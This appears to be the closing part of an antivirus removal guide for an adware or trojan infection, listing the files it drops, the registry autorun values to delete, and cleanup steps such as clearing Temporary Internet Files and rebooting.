%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\25.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\assistupdate.exe (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\5.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\11.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\10.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\wpsassist64.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\cgpb_polish.png (340 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\qqtj2[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\qqtj1[1].htm (3 bytes)
%Documents and Settings%\%current user%\Application Dataypfbyfgmr.exe (12288 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"FM4.0_201409180317" = "%Program Files%\FM4.0\201409180317\fm4.exe -mini"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"FM4.0_News_201409180317" = "%Program Files%\FM4.0\201409180317\fm4svr.exe -mini"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AlmDay" = "%Documents and Settings%\%current user%\Application Data\AlmDay\AlmDay.exe /start"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Æ»¹û×ÀÃæ" = "%Documents and Settings%\%current user%\Application Data\AppleDesktop\iApple.exe /from=autorun"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.